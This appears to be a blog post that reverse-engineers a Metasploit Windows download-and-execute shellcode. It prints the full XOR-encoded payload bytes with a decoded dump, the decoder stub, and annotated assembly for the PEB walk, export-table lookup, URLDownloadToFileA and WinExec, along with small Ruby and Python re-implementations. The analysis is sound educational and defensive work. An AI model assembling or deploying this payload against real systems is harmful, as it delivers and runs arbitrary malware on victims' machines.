What is the plural of the word shellcode? Neither shellcodes nor shellscode sound right. I believe that the word shellcode is a mass noun, so it's the same singular as plural. (Or at the very least, it only sounds right as a plural when used with a plural verb.) If I have some shellcode, and I add some more shellcode to that, then I still have some shellcode, more shellcode than before.

As a mass noun:

Bob has one shellcode.

Alice wrote three shellcode.

Malory has a lot of shellcode.

As a count noun:

Bob has one shellcode.

Alice wrote three shellcodes.

Malory has a lot of shellcodes.

Here is shellcode. ← Sounds ok to me.

Here is a shellcode. ← No, sounds wrong.

Here is some shellcode. ← Sounds ok to me.

Here is some shellcodes. ← No, sounds wrong.

Here are some shellcode. ← Doesn't sound right either.

Here are some shellcodes. ← Sounds ok to me.

Long Technical Part

Let's take a look at the MSF code

# This file is part of the Metasploit Framework and may be subject to


'License' => BSD_LICENSE,

'Platform' => 'win',

'Arch' => ARCH_X86,

'Privileged' => false,

'Payload' =>


'Offsets' => { },

'Payload' =>



The decoder is self-explanatory, so I don't know why I'm explaining it, anyway… It finds where it is in memory, XORs the encrypted code right after it, and then runs the decrypted code.

0000  EB10        jmp short 0x12           ; Get EIP trick
0002  5A          pop edx                  ; EDX points to the start
                                           ; of the encoded shellcode
0003  4A          dec edx                  ; The LOOP exits at ECX=0,
                                           ; so XOR [EDX+0],0x99 never
                                           ; happens (last XOR is [EDX+1])
0004  33C9        xor ecx,ecx              ; ECX = 0
0006  66B93C01    mov cx,0x13c             ; Shellcode length = 0x13C
000A  80340A99    xor byte [edx+ecx],0x99  ; Encoder/decoder (XOR) key = 0x99
000E  E2FA        loop 0xa                 ; XOR each byte from the end
                                           ; to the beginning
0010  EB05        jmp short 0x17           ; Run decoded shellcode
0012  E8EBFFFFFF  call 0x2                 ; PUSH EIP
0017  ...                                  ; Start of shellcode
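The stub boils down to one line of Python; XOR with a fixed key is its own inverse, and the loop direction doesn't matter:

```python
def xor_decode(encoded: bytes, key: int = 0x99) -> bytes:
    """What the decoder stub above does to the 0x13C-byte payload."""
    return bytes(b ^ key for b in encoded)

# From the side-by-side dump below: encoded bytes AA 59 C9 decode to
# 33 C0 50 (xor eax,eax / push eax), matching the right-hand column.
print(xor_decode(b"\xaa\x59\xc9").hex())
```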

Here's the decrypted shellcode, side by side with the original.


"\x70\x4C\x99\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"+ #000 e9 d5 00 00 00 5a 64 a1 30 00 00 00 8b 40 0c 8b |.....Zd.0....@..|

"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"+ #010 70 1c ad 8b 40 08 8b d8 8b 73 3c 8b 74 1e 78 03 |p...@....s<.t.x.|

"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"+ #020 f3 8b 7e 20 03 fb 8b 4e 14 33 ed 56 57 51 8b 3f |..~ ...N.3.VWQ.?|

"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"+ #030 03 fb 8b f2 6a 0e 59 f3 a6 74 08 59 5f 83 c7 04 |....j.Y..t.Y_...|

"xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"+ #040 45 e2 e9 59 5f 5e 8b cd 8b 46 24 03 c3 d1 e1 03 |E..Y_^...F$.....|

"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"+ #050 c1 33 c9 66 8b 08 8b 46 1c 03 c3 c1 e1 02 03 c1 |.3.f...F........|

"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9D\xC0"+ #060 8b 00 03 c3 8b fa 8b f7 83 c6 0e 8b d0 6a 04 59 |.............j.Y|

"\x71\xC9\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"+ #070 e8 50 00 00 00 83 c6 0d 52 56 ff 57 fc 5a 8b d8 |.P......RV.W.Z..|

"\xF3\x98\xC0\x71\xA4\x99\x99\x99\x1A\x5F\x8A\xCF\xDF\x19\xA7\x19"+ #080 6a 01 59 e8 3d 00 00 00 83 c6 13 56 46 80 3e 80 |j.Y.=......VF.>.|

"\xEC\x63\x19\xAF\x19\xC7\x1A\x75\xB9\x12\x45\xF3\xB9\xCA\x66\xCE"+ #090 75 fa 80 36 80 5e 83 ec 20 8b dc 6a 20 53 ff 57 |u..6.^.. ..j S.W|

"\x75\x5E\x9D\x9A\xC5\xF8\xB7\xFC\x5E\xDD\x9A\x9D\xE1\xFC\x99\x99"+ #0a0 ec c7 04 03 5c 61 2e 65 c7 44 03 04 78 65 00 00 |....a.e.D..xe..|

"\xAA\x59\xC9\xC9\xCA\xCF\xC9\x66\xCE\x65\x12\x45\xC9\xCA\x66\xCE"+ #0b0 33 c0 50 50 53 56 50 ff 57 fc 8b dc 50 53 ff 57 |3.PPSVP.W...PS.W|

"\x69\xC9\x66\xCE\x6D\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA"+ #0c0 f0 50 ff 57 f4 33 c0 ac 85 c0 75 f9 51 52 56 53 |.P.W.3....u.QRVS|

"\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59\x5A\x71\xBF\x66\x66\x66\xDE"+ #0d0 ff d2 5a 59 ab e2 ee 33 c0 c3 e8 26 ff ff ff 47 |..ZY...3...&...G|

"\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDE\xFC"+ #0e0 65 74 50 72 6f 63 41 64 64 72 65 73 73 00 47 65 |etProcAddress.Ge|

"\xED\xCA\xE0\xEA\xED\xFC\xF4\xDD\xF0\xEB\xFC\xFA\xED\xF6\xEB\xE0"+ #0f0 74 53 79 73 74 65 6d 44 69 72 65 63 74 6f 72 79 |tSystemDirectory|

"\xD8\x99\xCE\xF0\xF7\xDC\xE1\xFC\xFA\x99\xDC\xE1\xF0\xED\xCD\xF1"+ #100 41 00 57 69 6e 45 78 65 63 00 45 78 69 74 54 68 |A.WinExec.ExitTh|

"\xEB\xFC\xF8\xFD\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0"+ #110 72 65 61 64 00 4c 6f 61 64 4c 69 62 72 61 72 79 |read.LoadLibrary|

"\xD8\x99\xEC\xEB\xF5\xF4\xF6\xF7\x99\xCC\xCB\xD5\xDD\xF6\xEE\xF7"+ #120 41 00 75 72 6c 6d 6f 6e 00 55 52 4c 44 6f 77 6e |A.urlmon.URLDown|

"\xF5\xF6\xF8\xFD\xCD\xF6\xDF\xF0\xF5\xFC\xD8\x99" #130 6c 6f 61 64 54 6f 46 69 6c 65 41 00 |loadToFileA.|




# EXITFUNC is not supported :/


# Register command execution options


['URL', [ true, "The pre-encoded URL to the executable" ])

], self.class)



# Constructs the payload


def generate_stage

return module_info['Payload']['Payload'] + (datastore['URL'] || '') + "\x80"



Finding KERNEL32.DLL

The MSDN documentation on the PEB structure is rather lacking in detail.

This is a bit more useful: PEB on

Ditto for the MSDN info on _PEB_LDR_DATA

This is better:PEB_LDR_DATA on,

and this: PEB_LDR_DATA on

The best information I've found on the structures is from using dt in kd.

I originally drew this in ASCII, and then redrew this using the Unicode box drawing characters. But then I discovered that Firefox gets the font metrics completely wrong, so that box drawing characters, in a monospace font, are all different widths, so nothing lines up. ← This is stupid. So it's 7-bit ASCII for now. (WebKit based browsers get it right, and so does lynx and links.)

The first six instructions of the shellcode (after the EIP stuff) find KERNEL32.DLL's base address by walking down the following chain of structures.

The FS segment register points to the _TEB for each executing thread. (Everyone remembers segment registers from the 16-bit days, right?) This is much simpler than keeping the pointer in memory somewhere, and then remembering where that memory was, etc. (It's also used to find the final exception handler if the program just can't cope.) This is also a clever optimization if you're going to be referring to stuff in the structure a lot. (Although FS:0 is unreachable from most C compilers, so inline assembly must be used.) The segment registers aren't used for much in userspace protected mode, so it doesn't contribute to register pressure. The _TEB usually lives around 0x7FFDF000 depending on a bunch of factors (like which version of Windows is used and how many threads).

This technique assumes that KERNEL32.DLL is the first module loaded (the first node in the InInitializationOrderModuleList). If not, it'll crash and burn. Since all of the shellcode you see these days (in drive-by exploits, etc.) does this exact same PEB lookup trick, you can break it all just by loading a dummy DLL first, before KERNEL32. Windows 7 does this now, apparently by accident.

For the uninitiated, I'll show you how this works…


nt!_TEB

+0x000 NtTib : _NT_TIB <- FS:0

+0x01c EnvironmentPointer : Ptr32 Void

+0x020 ClientId : _CLIENT_ID

+0x028 ActiveRpcHandle : Ptr32 Void

+0x02c ThreadLocalStoragePointer : Ptr32 Void

+0x030 ProcessEnvironmentBlock : Ptr32 _PEB -----┐

+0x034 LastErrorValue : Uint4B │

+0x038 CountOfOwnedCriticalSections : Uint4B │

[etc.] │

┌-------------------------------------------┘ MOV EAX, [FS:0x30]


nt!_PEB

+0x000 InheritedAddressSpace : UChar

+0x001 ReadImageFileExecOptions : UChar

+0x002 BeingDebugged : UChar

+0x003 SpareBool : UChar

+0x004 Mutant : Ptr32 Void

+0x008 ImageBaseAddress : Ptr32 Void

+0x00c Ldr : Ptr32 _PEB_LDR_DATA ---------------┐

+0x010 ProcessParameters : Ptr32 _RTL_USER_PROCESS_PARAMETERS │

+0x014 SubSystemData : Ptr32 Void │

+0x018 ProcessHeap : Ptr32 Void │

+0x01c FastPebLock : Ptr32 _RTL_CRITICAL_SECTION │

+0x020 FastPebLockRoutine : Ptr32 Void │

+0x024 FastPebUnlockRoutine : Ptr32 Void │

+0x028 EnvironmentUpdateCount : Uint4B │

+0x02c KernelCallbackTable : Ptr32 Void │

+0x030 SystemReserved : [1] Uint4B │

+0x034 AtlThunkSListPtr32 : Uint4B │

+0x038 FreeList : Ptr32 _PEB_FREE_BLOCK │

[etc.] │

┌-------------------------------------------------------------┘ MOV EAX, [EAX+0xC]

nt!_PEB_LDR_DATA [AKA: "ProcessModuleInfo" or "PROCESS_MODULE_INFO"]

+0x000 Length : Uint4B

+0x004 Initialized : UChar

+0x008 SsHandle : Ptr32 Void

+0x00c InLoadOrderModuleList : _LIST_ENTRY

+0x014 InMemoryOrderModuleList : _LIST_ENTRY

+0x01c InInitializationOrderModuleList : _LIST_ENTRY -----┐

+0x024 EntryInProgress : Ptr32 Void │

┌------------------------------------------------------┘ MOV ESI, [EAX+0x1C] ; LODSD


│ +0x000 InLoadOrderLinks : _LIST_ENTRY

│ +0x000 Flink : Ptr32

│ +0x004 Blink : Ptr32

│ +0x008 InMemoryOrderLinks : _LIST_ENTRY

│ +0x000 Flink : Ptr32

│ +0x004 Blink : Ptr32

│ +0x010 InInitializationOrderLinks : _LIST_ENTRY

└-------> +0x000 Flink : Ptr32 -┐ This distance

+0x004 Blink : Ptr32 │ is eight bytes

+0x018 DllBase : Ptr32 Void -┘ DllBase → _IMAGE_DOS_HEADER

+0x01c EntryPoint : Ptr32 Void

+0x020 SizeOfImage : Uint4B

+0x024 FullDllName : _UNICODE_STRING

+0x02c BaseDllName : _UNICODE_STRING

+0x034 Flags : Uint4B

+0x038 LoadCount : Uint2B

+0x03a TlsIndex : Uint2B

+0x03c HashLinks : _LIST_ENTRY

+0x03c SectionPointer : Ptr32 Void

+0x040 CheckSum : Uint4B

+0x044 TimeDateStamp : Uint4B

+0x044 LoadedImports : Ptr32 Void

+0x048 EntryPointActivationContext : Ptr32 Void

+0x04c PatchInformation : Ptr32 Void
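The six-instruction walk can be sketched in Ruby with a toy memory model (each structure is a Hash keyed by byte offset; 0x77E80000 is the hypothetical WinXP SP2 KERNEL32 base address used later in this post):

```ruby
# Toy model of the PEB lookup chain. Offsets mirror the kd listings above.
KERNEL32_BASE = 0x77E80000             # hypothetical load address

ldr_entry = { 0x08 => KERNEL32_BASE }  # DllBase, 8 bytes past InInitializationOrderLinks
ldr       = { 0x1C => ldr_entry }      # _PEB_LDR_DATA.InInitializationOrderModuleList
peb       = { 0x0C => ldr }            # _PEB.Ldr
teb       = { 0x30 => peb }            # _TEB.ProcessEnvironmentBlock

def find_dll_base(teb)
  peb   = teb[0x30]  # MOV EAX, [FS:0x30]
  ldr   = peb[0x0C]  # MOV EAX, [EAX+0xC]
  entry = ldr[0x1C]  # MOV ESI, [EAX+0x1C] ; LODSD
  entry[0x08]        # MOV EAX, [EAX+0x8]  -> DllBase
end

printf("%08X\n", find_dll_base(teb))  # => 77E80000
```

This flattens the pointer dereferences into Hash lookups, but the offsets are the same ones the four MOVs use.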



Importing Functions

So at this point, the shellcode knows where to find the first DLL file that was mapped into memory. Now it finds functions in the library in the same way that Windows does it.


+0x000 InLoadOrderLinks : _LIST_ENTRY

+0x008 InMemoryOrderLinks : _LIST_ENTRY

+0x010 InInitializationOrderLinks : _LIST_ENTRY ← So EAX was pointing here

+0x018 DllBase : Ptr32 Void -------------┐ MOV EAX, [EAX+0x8]

[etc.] │

┌--------------------------------------------------------┘ MOV EBX, EAX

nt!_IMAGE_DOS_HEADER EBX points here, and is used for all Virtual Address offsets

+0x000 e_magic : Uint2B (usually "MZ")

+0x002 e_cblp : Uint2B

+0x004 e_cp : Uint2B

+0x006 e_crlc : Uint2B

+0x008 e_cparhdr : Uint2B

+0x00a e_minalloc : Uint2B

+0x00c e_maxalloc : Uint2B

+0x00e e_ss : Uint2B

+0x010 e_sp : Uint2B

+0x012 e_csum : Uint2B

+0x014 e_ip : Uint2B

+0x016 e_cs : Uint2B

+0x018 e_lfarlc : Uint2B

+0x01a e_ovno : Uint2B

+0x01c e_res : [4] Uint2B

+0x024 e_oemid : Uint2B

+0x026 e_oeminfo : Uint2B

+0x028 e_res2 : [10] Uint2B

+0x03c e_lfanew : Int4B -------┐ MOV ESI, [EBX+0x3C]




nt!_IMAGE_NT_HEADERS

+0x000 Signature : Uint4B (usually "PE\0\0") --┐

+0x004 FileHeader : _IMAGE_FILE_HEADER │

+0x000 Machine : Uint2B │

+0x002 NumberOfSections : Uint2B │

+0x004 TimeDateStamp : Uint4B │

+0x008 PointerToSymbolTable : Uint4B │

+0x00c NumberOfSymbols : Uint4B │

+0x010 SizeOfOptionalHeader : Uint2B │

+0x012 Characteristics : Uint2B │ This distance is

+0x018 OptionalHeader : _IMAGE_OPTIONAL_HEADER │ 0x78 bytes long

+0x000 Magic : Uint2B │

+0x002 MajorLinkerVersion : UChar │

+0x003 MinorLinkerVersion : UChar │

+0x004 SizeOfCode : Uint4B │ (That's 0x18+0x60 bytes

+0x008 SizeOfInitializedData : Uint4B │ from the PE header to the

+0x00c SizeOfUninitializedData : Uint4B │ _IMAGE_DATA_DIRECTORY)

+0x010 AddressOfEntryPoint : Uint4B │

+0x014 BaseOfCode : Uint4B │

+0x018 BaseOfData : Uint4B │

+0x01c ImageBase : Uint4B │

+0x020 SectionAlignment : Uint4B │

+0x024 FileAlignment : Uint4B │

+0x028 MajorOperatingSystemVersion : Uint2B │

+0x02a MinorOperatingSystemVersion : Uint2B │

+0x02c MajorImageVersion : Uint2B │

+0x02e MinorImageVersion : Uint2B │

+0x030 MajorSubsystemVersion : Uint2B │

+0x032 MinorSubsystemVersion : Uint2B │

+0x034 Win32VersionValue : Uint4B │

+0x038 SizeOfImage : Uint4B │

+0x03c SizeOfHeaders : Uint4B │

+0x040 CheckSum : Uint4B │

+0x044 Subsystem : Uint2B │

+0x046 DllCharacteristics : Uint2B │

+0x048 SizeOfStackReserve : Uint4B │

+0x04c SizeOfStackCommit : Uint4B │

+0x050 SizeOfHeapReserve : Uint4B │

+0x054 SizeOfHeapCommit : Uint4B │

+0x058 LoaderFlags : Uint4B │

+0x05c NumberOfRvaAndSizes : Uint4B │

+0x060 DataDirectory : [16] _IMAGE_DATA_DIRECTORY -┘ MOV ESI, [ESI+EBX+0x78]; ADD ESI, EBX


(This isn't exactly kd output; I've fabricated it.)

nt!_IMAGE_DATA_DIRECTORY Export Table

+0x060 +0x000 VirtualAddress : Uint4B RVA of the table - Relative to Base Address (EBX)

+0x064 +0x004 Size : Uint4B

nt!_IMAGE_DATA_DIRECTORY Import Table

+0x068 +0x008 VirtualAddress : Uint4B

[etc.] +0x00c Size : Uint4B

nt!_IMAGE_DATA_DIRECTORY Resource Table

+0x010 VirtualAddress : Uint4B

+0x014 Size : Uint4B

nt!_IMAGE_DATA_DIRECTORY Exception Table

+0x018 VirtualAddress : Uint4B

+0x01c Size : Uint4B

nt!_IMAGE_DATA_DIRECTORY Certificate Table

+0x020 VirtualAddress : Uint4B

+0x024 Size : Uint4B

nt!_IMAGE_DATA_DIRECTORY Base Relocation Table

+0x028 VirtualAddress : Uint4B

+0x02c Size : Uint4B

nt!_IMAGE_DATA_DIRECTORY Debug

+0x030 VirtualAddress : Uint4B

+0x034 Size : Uint4B

nt!_IMAGE_DATA_DIRECTORY Architecture

+0x038 VirtualAddress : Uint4B

+0x03c Size : Uint4B

nt!_IMAGE_DATA_DIRECTORY Global Ptr

+0x040 VirtualAddress : Uint4B

+0x044 Size : Uint4B

nt!_IMAGE_DATA_DIRECTORY TLS Table

+0x048 VirtualAddress : Uint4B

+0x04c Size : Uint4B

nt!_IMAGE_DATA_DIRECTORY Load Config Table

+0x050 VirtualAddress : Uint4B

+0x054 Size : Uint4B

nt!_IMAGE_DATA_DIRECTORY Bound Import

+0x058 VirtualAddress : Uint4B

+0x05c Size : Uint4B

nt!_IMAGE_DATA_DIRECTORY IAT

+0x060 VirtualAddress : Uint4B

+0x064 Size : Uint4B

nt!_IMAGE_DATA_DIRECTORY Delay Import Descriptor

+0x068 VirtualAddress : Uint4B

+0x06c Size : Uint4B

nt!_IMAGE_DATA_DIRECTORY CLR Runtime Header

+0x070 VirtualAddress : Uint4B

+0x074 Size : Uint4B

nt!_IMAGE_DATA_DIRECTORY Reserved

+0x078 VirtualAddress : Uint4B

+0x07c Size : Uint4B


Importing Functions

Now where were we...


+0x000 VirtualAddress : Uint4B -----┐ MOV ESI, [ESI+EBX+0x78] ; ADD ESI, EBX

+0x004 Size : Uint4B │




nt!_IMAGE_EXPORT_DIRECTORY

+0x000 Characteristics : Uint4B

+0x004 TimeDateStamp : Uint4B

+0x008 MajorVersion : Uint2B Number of Names or Functions in EAT

+0x00a MinorVersion : Uint2B Because of aliasing, these can be different values.

+0x00c Name : Uint4B The shellcode uses the wrong one for the name lookup loop.

+0x010 Base : Uint4B

+0x014 NumberOfFunctions : Uint4B ------ MOV ECX, [ESI+0x14]

+0x018 NumberOfNames : Uint4B

+0x01c AddressOfFunctions : Uint4B

+0x020 AddressOfNames : Uint4B -----┐ MOV EDI, [ESI+0x20] ; ADD EDI, EBX

+0x024 AddressOfNameOrdinals : Uint4B │

│ The Export Name Table is just an

│ array of pointers to C-style strings.

│ The Ordinal table uses the exact

│ same array indexes.


│ As a concrete example, I'm using RVA values from the WinXP SP2 English KERNEL32.DLL

│ The base address of this DLL is 0x77E80000, so EBX will be pointing there in the code below.

│ Base Address + RVA = Actual Virtual Address in memory (Most of the time)

EDI↓ AddressOfNames=0x577B2 AddressOfNameOrdinals=0x57144 AddressOfFunctions=0x56468

name[ 0]=0x5849B → "AddAtomA\0" ordinal[ 0]=0x0000 function[0x0000]=0x0000932E

name[ 1]=0x584A4 → "AddAtomW\0" ordinal[ 1]=0x0001 function[0x0001]=0x00009BC4

name[ 2]=0x584AD → "AddConsoleAliasA\0" ordinal[ 2]=0x0002 function[0x0002]=0x00044457

name[ 3]=0x584BE → "AddConsoleAliasW\0" ordinal[ 3]=0x0003 function[0x0003]=0x00044420

name[ 4]=0x584CF → "AllocConsole\0" ordinal[ 4]=0x0004 function[0x0004]=0x0004520E

name[ 5]=0x584DC → "AllocateUserPhysicalPages\0" ordinal[ 5]=0x0005 function[0x0005]=0x000339D6

name[ 6]=0x584F6 → "AreFileApisANSI\0" ordinal[ 6]=0x0006 function[0x0006]=0x00018678

name[ 7]=0x58506 → "AssignProcessToJobObject\0" ordinal[ 7]=0x0007 function[0x0007]=0x00043BAE

name[ 8]=0x5851F → "BackupRead\0" ordinal[ 8]=0x0008 function[0x0008]=0x00029776

name[ 9]=0x5852A → "BackupSeek\0" ordinal[ 9]=0x0009 function[0x0009]=0x000299D2

name[ 10]=0x58535 → "BackupWrite\0" ordinal[ 10]=0x000A function[0x000A]=0x0002A2FA

name[ 11]=0x58541 → "BaseAttachCompleteThunk\0" ordinal[ 11]=0x000B function[0x000B]=0x00028916

name[ 12]=0x58559 → "Beep\0" ordinal[ 12]=0x000C function[0x000C]=0x0002A518

[...] [...] [...]

name[339]=0x59DA5 → "GetProcAddress\0" ordinal[339]=0x0153 function[0x0153]=0x0001564B

[...] [...] [...]

name[821]=0x5BEA9 → "lstrlenA\0" ordinal[821]=0x0335 function[0x0335]=0x00017334

name[822]=0x5BEB2 → "lstrlenW\0" ordinal[822]=0x0336 function[0x0336]=0x0000CD5C

║ ⇑ ║ ⇑

╚====================================================╝ ╚========================╝

; So this loop walks down the AddressOfNames array, doing string comparisons with the strings stored at

; the end of the shellcode. It keeps track of how many iterations the loop has gone through,

; which will be the ordinal number when the loop exits.

; (The left half of the diagram above.)


; EDI and ECX get clobbered for the REPE CMPSB op

NameToOrdinal:

push edi ; 57 ; AddressOfNames Array Stack: EDI

push ecx ; 51 ; NumberOfFunctions left to go Stack: ECX EDI

mov edi, [edi] ; 8B 3F ; EDI points to start of a Name String

add edi, ebx ; 03 FB ; RVA to VA conversion

mov esi, edx ; 8B F2 ; EDX points to string table at end of shellcode "GetProcAddress" etc.

push byte +0xe ; 6A 0E ; Only compare the first fourteen chars

pop ecx ; 59 ; ECX = 0xE

repe cmpsb ; F3 A6 ; Compare [ESI] with [EDI]

jz Exitloop ; 74 08 ; If we've found the string, we're done

pop ecx ; 59 ; NumberOfFunctions left to check. Stack: EDI

pop edi ; 5F ; Current Index of AddressOfNames Array

add edi, byte +0x4 ; 83 C7 04 ; Next AddressOfNames pointer

inc ebp ; 45 ; Ordinal / AddressOfNames Array index

loop NameToOrdinal ; E2 E9 ;


; snip...

; This code finds the function's address using the ordinal

; (The center half of the diagram above.)

mov ecx, ebp ; 8B CD ; EBP = Ordinal (AddressOfNames Array index)

mov eax, [esi+0x24] ; 8B 46 24 ; AddressOfNameOrdinals RVA

add eax, ebx ; 03 C3 ; RVA to VA conversion

shl ecx, 1 ; D1 E1 ; Ordinal * 2

add eax, ecx ; 03 C1 ; EAX = (*AddressOfNameOrdinals) + (Ordinal * 2)

; to put in another way EAX = &AddressOfNameOrdinals[Ordinal]

xor ecx, ecx ; 33 C9 ; ECX = 0

mov cx, [eax] ; 66 8B 08 ; CX = Ultimate Index (FunctionOrdinal) into AddressOfFunctions

; (The right half of the diagram above.) (Yes I know that's three halves.)

mov eax, [esi+0x1c] ; 8B 46 1C ; AddressOfFunctions RVA

add eax, ebx ; 03 C3 ; RVA to VA conversion

shl ecx, 0x2 ; C1 E1 02 ; FunctionOrdinal * 4

add eax, ecx ; 03 C1 ; EAX = (*AddressOfFunctions) + (FunctionOrdinal * 4)

; alt. EAX = &AddressOfFunctions[AddressOfNameOrdinals[Ordinal]]

mov eax, [eax] ; 8B 00 ; EAX = RVA of function (ta-da)

add eax, ebx ; 03 C3 ; RVA to VA conversion
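In higher-level terms, the resolution goes name index, then ordinal, then function RVA across the three parallel arrays. A Ruby sketch using the concrete WinXP SP2 values from the table above:

```ruby
KERNEL32_BASE = 0x77E80000  # the DLL base address (EBX in the assembly above)

# Tiny excerpts of the three parallel export arrays, taken from the table above.
names     = { 339 => "GetProcAddress" }  # AddressOfNames (index => string)
ordinals  = { 339 => 0x0153 }            # AddressOfNameOrdinals (same indexes)
functions = { 0x0153 => 0x0001564B }     # AddressOfFunctions (keyed by ordinal)

def resolve(name, names, ordinals, functions, base)
  index   = names.key(name)  # the string-compare loop, conceptually
  ordinal = ordinals[index]  # CX = AddressOfNameOrdinals[index]
  base + functions[ordinal]  # EAX = function RVA, then RVA-to-VA conversion
end

printf("%08X\n", resolve("GetProcAddress", names, ordinals, functions, KERNEL32_BASE))  # => 77E9564B
```

0x77E80000 + 0x0001564B = 0x77E9564B, the virtual address of GetProcAddress in this example.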

The rest of the functions from KERNEL32.DLL which the shellcode uses are looked up with GetProcAddress() in a loop. Each function address is stored on top of the strings at the end of the shellcode. (i.e. It overwrites "GetProcAddress\0GetSystemDirectoryA\0" …etc.)

mov edi, edx ; 8B FA ; EDX points to string table

mov esi, edi ; 8B F7 ; And so now EDI and ESI point there too

add esi, byte +0xe ; 83 C6 0E ; "GetProcAddress" is 0xE bytes long, skip it.

mov edx, eax ; 8B D0 ; The address of GetProcAddress()

push byte +0x4 ; 6A 04 ; Number of names (after "GetProcAddress") to lookup in KERNEL32

pop ecx ; 59 ; ECX = 4 names to lookup

call GetFunctions ; E8 50000000 ; ------



; FARPROC WINAPI GetProcAddress(

; __in HMODULE hModule,

; __in LPCSTR lpProcName

; );


GetFunctions:

xor eax,eax ; 33C0 ; EAX = 0

lodsb ; AC ; EAX = byte [ESI] assumes DF=0 I guess

test eax,eax ; 85C0 ; Check if at end of function name string

jnz GetFunctions ; 75F9 ; The loop advances ESI to the end of

; this string and start of next

push ecx ; 51 ; Loop counter: 4,3,2,1

push edx ; 52 ; GetProcAddress function address

push esi ; 56 ; lpProcName = ESI = Start of name string in list

push ebx ; 53 ; hModule = KERNEL32 base address or URLMON base address

; GetProcAddress(hModule [in], lpProcName [in])

call edx ; FFD2 ; EAX = GetProcAddress(EBX, ESI)

pop edx ; 5A ; GetProcAddress function address

pop ecx ; 59 ; Loop counter: 4,3,2,1

stosd ; AB ; Store Function Pointer, EAX, at [EDI]

loop GetFunctions ; E2EE ; Lather, rinse, repeat

xor eax,eax ; 33C0 ; Return zero upon success?

ret ; C3 ; _______________________________________

db "GetProcAddress",0 ; EDI starts at this address.

db "GetSystemDirectoryA",0 ; After loading URLMON becomes [edi-0x14]

db "WinExec",0 ; After loading URLMON becomes [edi-0x10]

db "ExitThread",0 ; After loading URLMON becomes [edi-0x0C]

db "LoadLibraryA",0 ; [edi-0x04] After loading URLMON becomes [edi-0x08]



add esi, byte +0xd ; 83C60D ; ESI was at start of "LoadLibraryA\0" which is 0xD long

push edx ; 52 ; GetProcAddress function address

push esi ; 56 ; lpFileName = ESI point to "urlmon\0"

call near [edi-0x4] ; FF57FC ; EAX = LoadLibrary(ESI)


; HMODULE WINAPI LoadLibrary(

; __in LPCTSTR lpFileName

; );

pop edx ; 5A ; GetProcAddress function address

mov ebx, eax ; 8B D8 ; Handle to URLMON module

push byte +0x1 ; 6A 01 ; Number of names to lookup in URLMON.DLL

pop ecx ; 59 ; ECX = 1 name to lookup

call GetFunctions ; E8 3D000000 ; ------

add esi, byte +0x13 ; 83 C6 13 ; ESI was at "URLDownloadToFileA\0" so move past it

push esi ; 56 ; szURL = ESI points to URL


db "urlmon",0 ;

db "URLDownloadToFileA",0 ; becomes [edi-0x04]

Calling Functions (finally at last)

The URL is terminated with a 0x80 byte rather than a 0x00. Since this URL string is never encoded, it's probably an attempt to avoid null bytes, even to the very end!


strlen_80:

inc esi ; 46 ; Next letter of URL

cmp byte [esi],0x80 ; 803E80 ; Is it the end?

jnz strlen_80 ; 75FA ;

xor byte [esi],0x80 ; 803680 ; At end of URL, change 0x80 into a 0x00

pop esi ; 5E ; szURL = ESI points to URL
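The 0x80-terminator scan above, sketched in Ruby (the URL is just an illustrative value):

```ruby
# Walk the buffer until the 0x80 terminator, then patch it to a real NUL,
# as the inc/cmp/jnz/xor sequence above does.
def unterminate(buf)
  i = 0
  i += 1 until buf[i] == 0x80  # inc esi / cmp byte [esi],0x80 / jnz
  buf[i] = 0x00                # xor byte [esi],0x80
  buf[0, i].pack("C*")         # the C string the APIs will now see
end

url = "http://example.com/a.exe".bytes + [0x80]  # hypothetical pre-encoded URL
puts unterminate(url)  # => http://example.com/a.exe
```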

This just gets the path to the System32 directory.


; UINT WINAPI GetSystemDirectory(

; __out LPTSTR lpBuffer

; __in UINT uSize

; );

sub esp, byte +0x20 ; 83EC20 ; Make some space for the string on the stack

mov ebx, esp ; 8BDC ; EBX = lpBuffer

push byte +0x20 ; 6A20 ; uSize = 0x20 bytes

push ebx ; 53 ; lpBuffer (0x20 bytes on stack)

call near [edi-0x14] ; FF57EC ; EAX = string length = GetSystemDirectoryA(EBX, 0x20)

The string "\\a.exe" is appended onto the end of whatever GetSystemDirectory() returned, and the downloaded file from the URL is written to that.


; HRESULT URLDownloadToFile( LPUNKNOWN pCaller,

; LPCTSTR szURL,

; LPCTSTR szFileName,

; DWORD dwReserved,

; LPBINDSTATUSCALLBACK lpfnCB

; );

mov dword [ebx+eax], 0x652e615c ; C704035C612E65 ; lpBuffer + length = "\\a.e"

mov dword [ebx+eax+0x4], 0x6578 ; C744030478650000 ; lpBuffer + length + 4 = "ex"

xor eax, eax ; 33C0 ; EAX = 0 if that wasn't obvious

push eax ; 50 ; lpfnCB = 0

push eax ; 50 ; dwReserved = 0

push ebx ; 53 ; szFileName = %systemdir%\a.exe

push esi ; 56 ; szURL = URL at end of shellcode

push eax ; 50 ; pCaller = 0

call near [edi-0x4] ; FF57FC ; URLDownloadToFileA(0, ESI, EBX, 0, 0);
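Decoding the two MOV-immediate stores little-endian shows exactly which bytes land after the directory string (the system directory here is just a sample value, not something the shellcode hardcodes):

```ruby
# The two immediates from the disassembly above, written little-endian.
part1 = [0x652e615c].pack("V")  # bytes 5C 61 2E 65 = "\\a.e"
part2 = [0x00006578].pack("V")  # bytes 78 65 00 00 = "xe\0\0" (NULs terminate the path)

path = "C:\\WINDOWS\\system32" + part1 + part2  # sample GetSystemDirectoryA output
puts path.unpack1("Z*")  # => C:\WINDOWS\system32\a.exe
```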

Y'all know what's coming next... WinExec!



